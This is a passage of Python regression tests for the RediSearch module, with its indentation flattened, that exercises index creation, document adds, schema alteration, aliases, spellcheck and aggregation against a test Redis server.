# GH Issue 131
env.cmd('ft.create', 'ix', 'ON', 'HASH', 'schema', 'txt',
'text', 'num', 'numeric', 'sortable')
env.cmd('ft.add', 'ix', 'doc1', 1.0, 'fields', 'txt', 'foo')
env.cmd('ft.search', 'ix', 'foo', 'sortby', 'num')
def testParallelIndexing(env):
# GH Issue 207
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'txt', 'text')
from threading import Thread
env.getConnection()
ndocs = 100
def runner(tid):
cli = env.getConnection()
for num in range(ndocs):
cli.execute_command('ft.add', 'idx', 'doc{}_{}'.format(tid, num), 1.0,
'fields', 'txt', 'hello world' * 20)
ths = []
for tid in range(10):
ths.append(Thread(target=runner, args=(tid,)))
[th.start() for th in ths]
[th.join() for th in ths]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(1000, int(d['num_docs']))
def testDoubleAdd(env):
# Tests issue #210
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'hello world')
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc1', 1.0,
'fields', 'txt', 'goodbye world')
env.assertEqual('hello world', env.cmd('ft.get', 'idx', 'doc1')[1])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(1, env.cmd('ft.search', 'idx', 'hello')[0])
# Now with replace
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'replace',
'fields', 'txt', 'goodbye world')
env.assertEqual(1, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'hello')[0])
env.assertEqual('goodbye world', env.cmd('ft.get', 'idx', 'doc1')[1])
def testConcurrentErrors(env):
from multiprocessing import Process
import random
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'txt', 'text')
docs_per_thread = 100
num_threads = 50
docIds = ['doc{}'.format(x) for x in range(docs_per_thread)]
def thrfn():
myIds = docIds[::]
random.shuffle(myIds)
cli = env.getConnection()
with cli.pipeline(transaction=False) as pl:
for x in myIds:
pl.execute_command('ft.add', 'idx', x, 1.0,
'fields', 'txt', ' hello world ' * 50)
try:
pl.execute()
except Exception as e:
pass
# print e
thrs = [Process(target=thrfn) for x in range(num_threads)]
[th.start() for th in thrs]
[th.join() for th in thrs]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(100, int(d['num_docs']))
def testBinaryKeys(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'txt', 'text')
# Insert a document
env.cmd('ft.add', 'idx', 'Hello', 1.0, 'fields', 'txt', 'NoBin match')
env.cmd('ft.add', 'idx', 'Hello\x00World', 1.0, 'fields', 'txt', 'Bin match')
for _ in env.reloading_iterator():
waitForIndex(env, 'idx')
exp = [2L, 'Hello\x00World', ['txt', 'Bin match'], 'Hello', ['txt', 'NoBin match']]
res = env.cmd('ft.search', 'idx', 'match')
for r in res:
env.assertIn(r, exp)
def testNonDefaultDb(env):
if env.is_cluster():
raise unittest.SkipTest()
# Should be ok
env.cmd('FT.CREATE', 'idx1', 'ON', 'HASH', 'schema', 'txt', 'text')
try:
env.cmd('SELECT 1')
except redis.ResponseError:
return
# Should fail
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx2', 'ON', 'HASH', 'schema', 'txt', 'text')
def testDuplicateNonspecFields(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'schema', 'txt', 'text').ok()
env.expect('FT.ADD', 'idx', 'doc', 1.0, 'fields',
'txt', 'foo', 'f1', 'f1val', 'f1', 'f1val2', 'F1', 'f1Val3').ok()
res = env.cmd('ft.get', 'idx', 'doc')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertTrue(res['f1'] in ('f1val', 'f1val2'))
env.assertEqual('f1Val3', res['F1'])
def testDuplicateFields(env):
    # As of RS 2.0 this is allowed; only the latest field value is saved and indexed
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH',
'SCHEMA', 'txt', 'TEXT', 'num', 'NUMERIC', 'SORTABLE')
env.expect('FT.ADD', 'idx', 'doc', 1.0, 'FIELDS',
'txt', 'foo', 'txt', 'bar', 'txt', 'baz').ok()
env.expect('FT.SEARCH idx *').equal([1L, 'doc', ['txt', 'baz']])
def testDuplicateSpec(env):
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH',
'SCHEMA', 'f1', 'text', 'n1', 'numeric', 'f1', 'text')
def testSortbyMissingFieldSparse(env):
# Note, the document needs to have one present sortable field in
# order for the indexer to give it a sort vector
env.cmd('ft.create', 'idx', 'ON', 'HASH',
'SCHEMA', 'lastName', 'text', 'SORTABLE', 'firstName', 'text', 'SORTABLE')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'lastName', 'mark')
res = env.cmd('ft.search', 'idx', 'mark', 'WITHSORTKEYS', "SORTBY",
"firstName", "ASC", "limit", 0, 100)
# commented because we don't filter out exclusive sortby fields
# env.assertEqual([1L, 'doc1', None, ['lastName', 'mark']], res)
def testLuaAndMulti(env):
env.skip() # addhash isn't supported
if env.is_cluster():
raise unittest.SkipTest()
# Ensure we can work in Lua and Multi environments without crashing
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'f1', 'text', 'n1', 'numeric')
env.cmd('HMSET', 'hashDoc', 'f1', 'v1', 'n1', 4)
env.cmd('HMSET', 'hashDoc2', 'f1', 'v1', 'n1', 5)
r = env.getConnection()
r.eval("return redis.call('ft.add', 'idx', 'doc1', 1.0, 'fields', 'f1', 'bar')", "0")
r.eval("return redis.call('ft.addhash', 'idx', 'hashDoc', 1.0)", 0)
# Try in a pipeline:
with r.pipeline(transaction=True) as pl:
pl.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'f1', 'v3')
pl.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'f1', 'v4')
pl.execute_command('ft.addhash', 'idx', 'hashdoc2', 1.0)
pl.execute()
def testLanguageField(env):
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'language', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0,
'FIELDS', 'language', 'gibberish')
res = env.cmd('FT.SEARCH', 'idx', 'gibberish')
env.assertEqual([1L, 'doc1', ['language', 'gibberish']], res)
# The only way I can verify that LANGUAGE is parsed twice is ensuring we
# provide a wrong language. This is much easier to test than trying to
# figure out how a given word is stemmed
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'LANGUAGE',
'blah', 'FIELDS', 'language', 'gibber')
def testUninitSortvector(env):
# This would previously crash
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'f1', 'TEXT')
for x in range(2000):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(
x), 1.0, 'FIELDS', 'f1', 'HELLO')
env.broadcast('SAVE')
for x in range(10):
env.broadcast('DEBUG RELOAD')
def normalize_row(row):
return to_dict(row)
def assertAggrowsEqual(env, exp, got):
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
# and now, it's just free form:
exp = sorted(to_dict(x) for x in exp[1:])
got = sorted(to_dict(x) for x in got[1:])
env.assertEqual(exp, got)
def assertResultsEqual(env, exp, got, inorder=True):
from pprint import pprint
# pprint(exp)
# pprint(got)
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
exp = list(grouper(exp[1:], 2))
got = list(grouper(got[1:], 2))
for x in range(len(exp)):
exp_did, exp_fields = exp[x]
got_did, got_fields = got[x]
env.assertEqual(exp_did, got_did, message="at position {}".format(x))
got_fields = to_dict(got_fields)
exp_fields = to_dict(exp_fields)
env.assertEqual(exp_fields, got_fields, message="at position {}".format(x))
def testAlterIndex(env):
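    # FT.ALTER SCHEMA ADD: text, sortable and numeric fields added after creation can be indexed and queried.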
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'f1', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2', 'TEXT')
waitForIndex(env, 'idx')
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
    # RS 2.0 reindexes, so after a reload both documents are found
# for _ in env.retry_with_reload():
res = env.cmd('FT.SEARCH', 'idx', 'world')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([2L, 'doc2', ['f1', 'hello', 'f2', 'world'], 'doc1', ['f1', 'hello', 'f2', 'world']]))
# env.assertEqual([1, 'doc2', ['f1', 'hello', 'f2', 'world']], ret)
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f3', 'TEXT', 'SORTABLE')
for x in range(10):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(x + 3), 1.0,
'FIELDS', 'f1', 'hello', 'f3', 'val{}'.format(x))
for _ in env.retry_with_reload():
waitForIndex(env, 'idx')
# Test that sortable works
res = env.cmd('FT.SEARCH', 'idx', 'hello', 'SORTBY', 'f3', 'DESC')
exp = [12, 'doc12', ['f1', 'hello', 'f3', 'val9'], 'doc11', ['f1', 'hello', 'f3', 'val8'],
'doc10', ['f1', 'hello', 'f3', 'val7'], 'doc9', ['f1', 'hello', 'f3', 'val6'],
'doc8', ['f1', 'hello', 'f3', 'val5'], 'doc7', ['f1', 'hello', 'f3', 'val4'],
'doc6', ['f1', 'hello', 'f3', 'val3'], 'doc5', ['f1', 'hello', 'f3', 'val2'],
'doc4', ['f1', 'hello', 'f3', 'val1'], 'doc3', ['f1', 'hello', 'f3', 'val0']]
assertResultsEqual(env, exp, res)
# Test that we can add a numeric field
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'n1', 'NUMERIC')
env.cmd('FT.ADD', 'idx', 'docN1', 1.0, 'FIELDS', 'n1', 50)
env.cmd('FT.ADD', 'idx', 'docN2', 1.0, 'FIELDS', 'n1', 250)
for _ in env.retry_with_reload():
waitForIndex(env, 'idx')
res = env.cmd('FT.SEARCH', 'idx', '@n1:[0 100]')
env.assertEqual([1, 'docN1', ['n1', '50']], res)
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'NOT_ADD', 'f2', 'TEXT').error()
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD').error()
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2').error()
def testAlterValidation(env):
    # Test constraints of the ALTER command
env.cmd('FT.CREATE', 'idx1', 'ON', 'HASH', 'SCHEMA', 'f0', 'TEXT')
for x in range(1, 32):
env.cmd('FT.ALTER', 'idx1', 'SCHEMA', 'ADD', 'f{}'.format(x), 'TEXT')
# OK for now.
    # Adding one more text field should fail (too many text fields)
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'idx1', 'SCHEMA', 'ADD', 'tooBig', 'TEXT')
env.cmd('FT.CREATE', 'idx2', 'MAXTEXTFIELDS', 'ON', 'HASH', 'SCHEMA', 'f0', 'TEXT')
# print env.cmd('FT.INFO', 'idx2')
for x in range(1, 50):
env.cmd('FT.ALTER', 'idx2', 'SCHEMA', 'ADD', 'f{}'.format(x + 1), 'TEXT')
env.cmd('FT.ADD', 'idx2', 'doc1', 1.0, 'FIELDS', 'f50', 'hello')
for _ in env.retry_with_reload():
waitForIndex(env, 'idx2')
ret = env.cmd('FT.SEARCH', 'idx2', '@f50:hello')
env.assertEqual([1, 'doc1', ['f50', 'hello']], ret)
env.cmd('FT.CREATE', 'idx3', 'ON', 'HASH', 'SCHEMA', 'f0', 'text')
# Try to alter the index with garbage
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx3',
'SCHEMA', 'ADD', 'f1', 'TEXT', 'f2', 'garbage')
ret = to_dict(env.cmd('ft.info', 'idx3'))
env.assertEqual(1, len(ret['fields']))
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'nonExist', 'SCHEMA', 'ADD', 'f1', 'TEXT')
# test with no fields!
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
def testIssue366_2(env):
# FT.CREATE atest SCHEMA textfield TEXT numfield NUMERIC
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world"}' FIELDS textfield sometext numfield 1234
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world2"}' REPLACE PARTIAL FIELDS numfield 1111
# shutdown
env.cmd('FT.CREATE', 'idx1', 'ON', 'HASH',
'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.cmd('FT.ADD', 'idx1', 'doc1', 1, 'PAYLOAD', '{"hello":"world"}',
'FIELDS', 'textfield', 'sometext', 'numfield', 1234)
env.cmd('ft.add', 'idx1', 'doc1', 1,
'PAYLOAD', '{"hello":"world2"}',
'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 'sometext', 'numfield', 1111)
for _ in env.retry_with_reload():
        pass
def testIssue654(env):
# Crashes during FILTER
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'id', 'numeric')
env.cmd('ft.add', 'idx', 1, 1, 'fields', 'id', 1)
env.cmd('ft.add', 'idx', 2, 1, 'fields', 'id', 2)
res = env.cmd('ft.search', 'idx', '*', 'filter', '@version', 0, 2)
def testReplaceReload(env):
env.cmd('FT.CREATE', 'idx2', 'ON', 'HASH',
'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
# Create a document and then replace it.
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'FIELDS', 'textfield', 's1', 'numfield', 99)
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's100', 'numfield', 990)
env.dump_and_reload()
# RDB Should still be fine
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's200', 'numfield', 1090)
doc = to_dict(env.cmd('FT.GET', 'idx2', 'doc2'))
env.assertEqual('s200', doc['textfield'])
env.assertEqual('1090', doc['numfield'])
# command = 'FT.CREATE idx SCHEMA '
# for i in range(255):
# command += 't%d NUMERIC SORTABLE ' % i
# command = command[:-1]
# r.execute_command(command)
# r.execute_command('save')
# // reload from ...
# r.execute_command('FT.ADD idx doc1 1.0 FIELDS t0 1')
def testIssue417(env):
command = ['ft.create', 'idx', 'ON', 'HASH', 'schema']
for x in range(255):
command += ['t{}'.format(x), 'numeric', 'sortable']
command = command[:-1]
env.cmd(*command)
for _ in env.reloading_iterator():
waitForIndex(env, 'idx')
try:
env.execute_command('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 't0', '1')
except redis.ResponseError as e:
env.assertTrue('already' in e.message.lower())
# >FT.CREATE myIdx SCHEMA title TEXT WEIGHT 5.0 body TEXT url TEXT
# >FT.ADD myIdx doc1 1.0 FIELDS title "hello world" body "lorem ipsum" url "www.google.com"
# >FT.SEARCH myIdx "no-as"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
# >FT.SEARCH myIdx "no-as"
# (error) Unknown Index name
def testIssue422(env):
env.cmd('ft.create', 'myIdx', 'ON', 'HASH', 'schema',
'title', 'TEXT', 'WEIGHT', '5.0',
'body', 'TEXT',
'url', 'TEXT')
    env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'FIELDS', 'title', 'hello world', 'body', 'lorem ipsum', 'url', 'www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'no-as')
env.assertEqual([0], rv)
def testIssue446(env):
env.cmd('ft.create', 'myIdx', 'ON', 'HASH', 'schema',
'title', 'TEXT', 'SORTABLE')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'fields', 'title', 'hello world', 'body', 'lorem ipsum', 'url', '"www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([1], rv)
# Related - issue 635
env.cmd('ft.add', 'myIdx', 'doc2', '1.0', 'fields', 'title', 'hello')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([2], rv)
def testTimeoutSettings(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 't1', 'text')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'BLAHBLAH').raiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'RETURN').notRaiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'FAIL').notRaiseError()
def testAlias(env):
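    # Index aliases: aliasAdd/aliasUpdate/aliasDel, including re-pointing an alias after the aliased index is dropped.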
conn = getConnectionByEnv(env)
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'PREFIX', 1, 'doc1', 'schema', 't1', 'text')
env.cmd('ft.create', 'idx2', 'ON', 'HASH', 'PREFIX', 1, 'doc2', 'schema', 't1', 'text')
env.expect('ft.aliasAdd', 'myIndex').raiseError()
env.expect('ft.aliasupdate', 'fake_alias', 'imaginary_alias', 'Too_many_args').raiseError()
env.cmd('ft.aliasAdd', 'myIndex', 'idx')
env.cmd('ft.add', 'myIndex', 'doc1', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'idx', 'hello')
env.assertEqual([1, 'doc1', ['t1', 'hello']], r)
r2 = env.cmd('ft.search', 'myIndex', 'hello')
env.assertEqual(r, r2)
# try to add the same alias again; should be an error
env.expect('ft.aliasAdd', 'myIndex', 'idx2').raiseError()
env.expect('ft.aliasAdd', 'alias2', 'idx').notRaiseError()
# now delete the index
env.cmd('ft.drop', 'myIndex')
# RS2 does not delete doc on ft.drop
conn.execute_command('DEL', 'doc1')
    # the alias mapping should be cleared now. This can be tested by pointing
    # the old alias at a different index
env.cmd('ft.aliasAdd', 'myIndex', 'idx2')
env.cmd('ft.aliasAdd', 'alias2', 'idx2')
env.cmd('ft.add', 'myIndex', 'doc2', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'alias2', 'hello')
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# check that aliasing one alias to another returns an error. This will
# end up being confusing
env.expect('ft.aliasAdd', 'alias3', 'myIndex').raiseError()
# check that deleting the alias works as expected
env.expect('ft.aliasDel', 'myIndex').notRaiseError()
env.expect('ft.search', 'myIndex', 'foo').raiseError()
# create a new index and see if we can use the old name
env.cmd('ft.create', 'idx3', 'ON', 'HASH', 'PREFIX', 1, 'doc3', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx3', 'doc3', 1.0, 'fields', 't1', 'foo')
env.cmd('ft.aliasAdd', 'myIndex', 'idx3')
# also, check that this works in rdb save
for _ in env.retry_with_rdb_reload():
waitForIndex(env, 'myIndex')
r = env.cmd('ft.search', 'myIndex', 'foo')
env.assertEqual([1L, 'doc3', ['t1', 'foo']], r)
# Check that we can move an alias from one index to another
env.cmd('ft.aliasUpdate', 'myIndex', 'idx2')
r = env.cmd('ft.search', 'myIndex', "hello")
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# Test that things like ft.get, ft.aggregate, etc. work
r = env.cmd('ft.get', 'myIndex', 'doc2')
env.assertEqual(['t1', 'hello'], r)
r = env.cmd('ft.aggregate', 'myIndex', 'hello', 'LOAD', '1', '@t1')
env.assertEqual([1, ['t1', 'hello']], r)
# Test update
env.expect('ft.aliasAdd', 'updateIndex', 'idx3')
env.expect('ft.aliasUpdate', 'updateIndex', 'fake_idx')
r = env.cmd('ft.del', 'idx2', 'doc2')
env.assertEqual(1, r)
env.expect('ft.aliasdel').raiseError()
env.expect('ft.aliasdel', 'myIndex', 'yourIndex').raiseError()
env.expect('ft.aliasdel', 'non_existing_alias').raiseError()
def testNoCreate(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'f1', 'text')
env.expect('ft.add', 'idx', 'schema', 'f1').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'fields', 'f1', 'hello').notRaiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'world').notRaiseError()
def testSpellCheck(env):
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
rv = env.cmd('FT.SPELLCHECK', 'idx', '111111')
env.assertEqual([['TERM', '111111', []]], rv)
if not env.isCluster():
rv = env.cmd('FT.SPELLCHECK', 'idx', '111111', 'FULLSCOREINFO')
env.assertEqual([1L, ['TERM', '111111', []]], rv)
# Standalone functionality
def testIssue484(env):
# Issue with split
# 127.0.0.1:6379> ft.drop productSearch1
# OK
# 127.0.0.1:6379> "FT.CREATE" "productSearch1" "NOSCOREIDX" "SCHEMA" "productid" "TEXT" "categoryid" "TEXT" "color" "TEXT" "timestamp" "NUMERIC"
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID1" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID2" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "small cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID3" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID4" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "green" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID5" "1.0" "REPLACE" "FIELDS" "productid" "3" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> FT.AGGREGATE productSearch1 * load 2 @color @categoryid APPLY "split(format(\"%s-%s\",@color,@categoryid),\"-\")" as value GROUPBY 1 @value REDUCE COUNT 0 as value_count
env.cmd('ft.create', 'productSearch1', 'noscoreidx', 'ON', 'HASH', 'schema', 'productid',
'text', 'categoryid', 'text', 'color', 'text', 'timestamp', 'numeric')
env.cmd('ft.add', 'productSearch1', 'GUID1', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID2', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'small cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID3', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID4', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'green', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID5', '1.0', 'REPLACE', 'FIELDS', 'productid', '3', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
res = env.cmd('FT.AGGREGATE', 'productSearch1', '*',
'load', '2', '@color', '@categoryid',
'APPLY', 'split(format("%s-%s",@color,@categoryid),"-")', 'as', 'value',
'GROUPBY', '1', '@value',
'REDUCE', 'COUNT', '0', 'as', 'value_count',
'SORTBY', '4', '@value_count', 'DESC', '@value', 'ASC')
expected = [6, ['value', 'white', 'value_count', '2'], ['value', 'cars', 'value_count', '2'], ['value', 'small cars', 'value_count', '1'], ['value', 'blue', 'value_count', '2'], ['value', 'Big cars', 'value_count', '2'], ['value', 'green', 'value_count', '1']]
assertAggrowsEqual(env, expected, res)
for var in expected:
env.assertIn(var, res)
def testIssue501(env):
env.cmd('FT.CREATE', 'incidents', 'ON', 'HASH', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.cmd('FT.DICTADD', 'slang', 'timmies', 'toque', 'toonie', 'serviette', 'kerfuffle', 'chesterfield')
rv = env.cmd('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'INCLUDE', 'slang', 'TERMS', 'EXCLUDE', 'slang')
env.assertEqual("qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq", rv[0][1])
env.assertEqual([], rv[0][2])
env.expect('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'FAKE_COMMAND', 'slang').error()
def testIssue589(env):
env.cmd('FT.CREATE', 'incidents', 'ON', 'HASH', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.expect('FT.SPELLCHECK', 'incidents', 'report :').error().contains("Syntax error at offset")
def testIssue621(env):
env.expect('ft.create', 'test', 'ON', 'HASH', 'SCHEMA', 'uuid', 'TAG', 'title', 'TEXT').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'uuid', 'foo', 'title', 'bar').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'title', 'bar').equal('OK')
res = env.cmd('ft.search', 'test', '@uuid:{foo}')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([1L, 'a', ['uuid', 'foo', 'title', 'bar']]))
# Server crash on doc names that conflict with index keys #666
# again, this test is not relevant because the index is outside the keyspace
# def testIssue666(env):
# # We cannot reliably determine that any error will occur in cluster mode
# # because of the key name
# env.skipOnCluster()
# env.cmd('ft.create', 'foo', 'schema', 'bar', 'text')
# env.cmd('ft.add', 'foo', 'mydoc', 1, 'fields', 'bar', 'one two three')
# # crashes here
# with env.assertResponseError():
# env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'fields', 'bar', 'four five six')
# # try with replace:
# with env.assertResponseError():
# env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'REPLACE',
# 'FIELDS', 'bar', 'four five six')
# with env.assertResponseError():
# env.cmd('ft.add', 'foo', 'idx:foo', '1', 'REPLACE',
# 'FIELDS', 'bar', 'four five six')
# env.cmd('ft.add', 'foo', 'mydoc1', 1, 'fields', 'bar', 'four five six')
# 127.0.0.1:6379> flushdb
# OK
# 127.0.0.1:6379> ft.create foo SCHEMA bar text
# OK
# 127.0.0.1:6379> ft.add foo mydoc 1 FIELDS bar "one two three"
# OK
# 127.0.0.1:6379> keys *
# 1) "mydoc"
# 2) "ft:foo/one"
# 3) "idx:foo"
# 4) "ft:foo/two"
# 5) "ft:foo/three"
# 127.0.0.1:6379> ft.add foo "ft:foo/two" 1 FIELDS bar "four five six"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
def testPrefixDeletedExpansions(env):
env.skipOnCluster()
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'txt1', 'text', 'tag1', 'tag')
    # get the maximum number of expansions
maxexpansions = int(env.cmd('ft.config', 'get', 'MAXEXPANSIONS')[0][1])
for x in range(maxexpansions):
env.cmd('ft.add', 'idx', 'doc{}'.format(x), 1, 'fields',
'txt1', 'term{}'.format(x), 'tag1', 'tag{}'.format(x))
for x in range(maxexpansions):
env.cmd('ft.del', 'idx', 'doc{}'.format(x))
env.cmd('ft.add', 'idx', 'doc_XXX', 1, 'fields', 'txt1', 'termZZZ', 'tag1', 'tagZZZ')
# r = env.cmd('ft.search', 'idx', 'term*')
# print(r)
# r = env.cmd('ft.search', 'idx', '@tag1:{tag*}')
# print(r)
    tmax = time.time() + 0.5  # 500ms max
iters = 0
while time.time() < tmax:
iters += 1
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
if r[0]:
break
# print 'did {} iterations'.format(iters)
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
env.assertEqual(toSortedFlatList([1, 'doc_XXX', ['txt1', 'termZZZ', 'tag1', 'tagZZZ']]), toSortedFlatList(r))
def testOptionalFilter(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 't1', 'text')
for x in range(100):
env.cmd('ft.add', 'idx', 'doc_{}'.format(x), 1, 'fields', 't1', 'hello world word{}'.format(x))
env.cmd('ft.explain', 'idx', '(~@t1:word20)')
# print(r)
r = env.cmd('ft.search', 'idx', '~(word20 => {$weight: 2.0})')
def testIssue736(env):
    # in RS 2.0 ft.add does not return certain errors
env.skip()
# 1. create the schema, we need a tag field
env.cmd('ft.create', 'idx', 'ON', 'HASH',
'schema', 't1', 'text', 'n2', 'numeric', 't2', 'tag')
# 2. create a single document to initialize at least one RSAddDocumentCtx
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 't2', 'foo, bar')
# 3. create a second document with many filler fields to force a realloc:
extra_fields = []
for x in range(20):
extra_fields += ['nidx_fld{}'.format(x), 'val{}'.format(x)]
